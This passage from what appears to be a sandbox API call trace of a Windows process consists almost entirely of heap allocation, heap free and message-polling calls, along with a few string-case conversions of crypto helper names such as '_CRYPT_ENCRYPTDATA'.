hHeap=0x8a0000) returned 1 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2435) returned 0x9004b0 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2435) returned 0x9028f0 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004b0 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2435) returned 0x9004b0 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9004b0 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.300] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.301] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.301] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2435) returned 0x9004b0 [0187.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.301] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0187.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2628 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0187.302] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fd0 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0187.302] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2435) returned 0xbea018 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0187.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0187.303] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.303] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.304] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28a8 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.304] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.305] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.305] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.305] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0187.306] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.306] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.306] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.307] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0187.307] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.307] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.308] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.308] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0187.308] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.308] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0187.309] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0187.310] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.310] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 